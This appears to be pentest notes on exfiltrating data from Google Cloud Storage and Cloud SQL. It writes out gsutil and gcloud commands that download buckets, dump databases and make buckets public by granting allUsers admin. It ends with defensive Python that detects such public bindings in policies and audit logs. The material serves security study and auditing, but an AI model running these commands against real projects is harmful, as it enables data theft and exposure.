Data Exfiltration

Unauthorized transfer of data from an organization's environment to an attacker-controlled server. The Google Cloud services where organizations typically store important data are Cloud SQL, Cloud Storage buckets, BigQuery and Persistent Disk.

Cloud Storage

Cloud Storage is a repository for data stored as objects. Access is governed by two kinds of policy: a bucket-level IAM policy (uniform bucket-level access), which applies to every object in the bucket, and ACLs, which are applied to individual objects. The principals (identities) that can appear in a storage IAM policy include "allUsers" (unauthenticated users, i.e. anonymous access), "allAuthenticatedUsers" (anyone with a Google account), and ordinary IAM members (users, groups and service accounts within the organization or project) controlled by IAM policies.

Normal Bucket Data Exfil

List the objects in a GCP bucket:

gsutil ls gs://[BUCKET NAME]

Download data from a GCP bucket to the attacker's system:

gsutil cp gs://[BUCKET NAME]/data data

SQL Databases and Buckets Exfil

First copy the bucket contents to a local directory (the -r flag is needed to copy a prefix recursively):

gsutil cp -r gs://bucket-name/folder/ .

Then create a new storage bucket, grant the Cloud SQL instance's service account write access to it, and export the database:

gsutil mb gs://<googlestoragename>

gsutil acl ch -u <service account>:W gs://<googlestoragename>

gcloud sql export sql <sql instance name> gs://<googlestoragename>/sqldump.gz --database=<database name>

Data Exfiltration by Changing the Bucket Policy

Data exfiltration via a bucket policy change means altering the bucket's IAM policy so that everyone can access the objects in the GCP bucket. It requires a principal that already holds roles/storage.admin (or any role that includes the storage.buckets.setIamPolicy permission), since that permission is what allows the bucket policy to be modified.

Enumerate bucket names belonging to an organization by keyword (Anonymous - Enum Tool):

cloud_enum.py -k example

Get information about the objects in a bucket (Anonymous - REST API):

curl https://storage.googleapis.com/[BUCKET NAME]

Check which IAM permissions the caller has on the bucket (Anonymous - REST API):

https://www.googleapis.com/storage/v1/b/[BUCKET_NAME]/iam/testPermissions?permissions=storage.buckets.delete&permissions=storage.buckets.get&permissions=storage.buckets.getIamPolicy&permissions=storage.buckets.setIamPolicy&permissions=storage.buckets.update&permissions=storage.objects.create&permissions=storage.objects.delete&permissions=storage.objects.get&permissions=storage.objects.list&permissions=storage.objects.update

List all roles attached to this bucket (Anonymous - gsutil):

gsutil iam get gs://[BUCKET NAME]

Add an admin role for allUsers (Anonymous - gsutil):

gsutil iam ch allUsers:admin gs://[BUCKET NAME]

Another way is to modify the bucket-level IAM policy while impersonating a service account, granting object read access to all users:

gsutil -i prod-sa@{project}.iam.gserviceaccount.com iam ch allUsers:objectViewer gs://[BUCKET NAME]
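Defender's counterpart to the bucket-policy change above, added here as an example that is not part of the original page: a small Python audit that flags allUsers / allAuthenticatedUsers bindings in a bucket IAM policy (the JSON shape returned by gsutil iam get) and picks out the setIamPermissions audit-log entry that introduced such a binding. The sample policy, the log entry and the project name are constructed; the audit-log field layout (protoPayload.serviceData.policyDelta.bindingDeltas) is an assumption.

```python
import json

# Principals that expose a bucket outside the organization.
PUBLIC_MEMBERS = {"allUsers", "allAuthenticatedUsers"}

# Constructed sample in the shape returned by `gsutil iam get gs://BUCKET`.
SAMPLE_POLICY = json.loads("""
{
  "bindings": [
    {"role": "roles/storage.legacyBucketOwner",
     "members": ["projectOwner:example-project", "projectEditor:example-project"]},
    {"role": "roles/storage.objectViewer", "members": ["allUsers"]},
    {"role": "roles/storage.admin", "members": ["allAuthenticatedUsers"]}
  ],
  "etag": "CAE="
}
""")

# Constructed sample Cloud Audit Log entry for a policy change on a bucket.
# Field names are an assumption about the policyDelta layout, not a verified schema.
SAMPLE_LOG_ENTRY = {
    "protoPayload": {
        "methodName": "storage.setIamPermissions",
        "resourceName": "projects/_/buckets/example-bucket",
        "authenticationInfo": {"principalEmail": "prod-sa@example-project.iam.gserviceaccount.com"},
        "serviceData": {"policyDelta": {"bindingDeltas": [
            {"action": "ADD", "role": "roles/storage.admin", "member": "allUsers"},
            {"action": "ADD", "role": "roles/storage.objectViewer", "member": "user:alice@example.com"},
        ]}},
    }
}

def find_public_bindings(policy):
    """Return (role, member) pairs in a bucket policy that grant access to public principals."""
    hits = []
    for binding in policy.get("bindings", []):
        for member in binding.get("members", []):
            if member in PUBLIC_MEMBERS:
                hits.append((binding["role"], member))
    return hits

def public_grants_in_log(entry):
    """Return public (role, member) bindings ADDed by a setIamPermissions audit-log entry."""
    payload = entry.get("protoPayload", {})
    if payload.get("methodName") != "storage.setIamPermissions":
        return []
    deltas = payload.get("serviceData", {}).get("policyDelta", {}).get("bindingDeltas", [])
    return [(d["role"], d["member"]) for d in deltas
            if d.get("action") == "ADD" and d.get("member") in PUBLIC_MEMBERS]

if __name__ == "__main__":
    print("public bindings in policy:", find_public_bindings(SAMPLE_POLICY))
    print("public grants in log entry:", public_grants_in_log(SAMPLE_LOG_ENTRY))
```

Pointing find_public_bindings at the live output of gsutil iam get for each bucket, and public_grants_in_log at exported audit logs, turns the two checks into a periodic exposure audit and a change alert respectively.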
